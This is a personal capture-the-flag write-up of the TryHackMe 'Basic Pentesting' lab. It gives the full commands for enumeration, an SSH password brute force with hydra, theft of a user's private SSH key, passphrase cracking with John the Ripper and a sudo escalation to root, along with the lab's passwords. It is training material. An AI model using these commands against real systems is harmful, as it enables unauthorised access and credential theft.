Kartibok's CTF Journey

A list of my write-ups as well as my methods and ways of completing challenges

---

Project maintained by Kartibok Hosted on GitHub Pages — Theme by mattgraham

Basic Pentesting

tryhackme

nmap

Port 22 SSH
Port 80 HTTP
Port 139 Samba
Port 445 Samba
Port 8009 AJP
Port 8080 HTTP Apache Tomcat 9.0.7

gobuster

Initial page under construction. Enumerate main page and find:

/development

Continue directory serach but nothing else shows.

Two files exisit:

dev.txt

2018-04-23: I've been messing with that struts stuff, and it's pretty cool! I think it might be neat
to host that on this server too. Haven't made any real web apps yet, but I have tried that example
you get to show off how it works (and it's the REST version of the example!). Oh, and right now I'm
using version 2.5.12, because other versions were giving me trouble. -K

2018-04-22: SMB has been configured. -K

2018-04-21: I got Apache set up. Will put in our content later. -J

j.txt

For J:

I've been auditing the contents of /etc/shadow to make sure we don't have any weak credentials,
and I was able to crack your hash really easily. You know our password policy, so please follow
it? Change that password ASAP.

-K

smbmap

smbmap -H <IP>

Provides Anonymous account

smbclient //<IP>anonymous

Provides staff.txt letter confirming two usernames - Jay and Kay

hydra

hydra -t 4 -l jan -P <rockyou.txt directory> ssh://<MACHINE IP>

Provides Jan’s password armando

ssh

Logging into Jan’s account does not show anything and also no ability to sudo.

Investigate /home directory and we find Kay:

pass.bak
.ssh

Copy id_rsa from .ssh file and save on attacker computer.

john the ripper

Hash the key with the following command:

python /usr/share/john/ssh2john.py id_rsa > id_rsa.hash

Now use John to crack the hash. This only provides the passphrase for the public key.

/usr/sbin/john --wordlist=/root/Desktop/dict/rockyou.txt id_rsa.hash

We find beeswax is the passphrase.

enumeration

Now login from Jan on the target host using:

ssh -i /home/kay/.ssh/id_rsa kay@<IP>

We now have Kay’s account. Remember the pass.bak. Cat this:

heresareallystrongpasswordthatfollowsthepasswordpolicy$$

Now see what we can do with sudo -l:

User kay may run the following commands on basic2:
  (ALL : ALL) ALL

So we have full control, just switch to root and after looking in the /root folder we have a congratulations flag.

Regards

K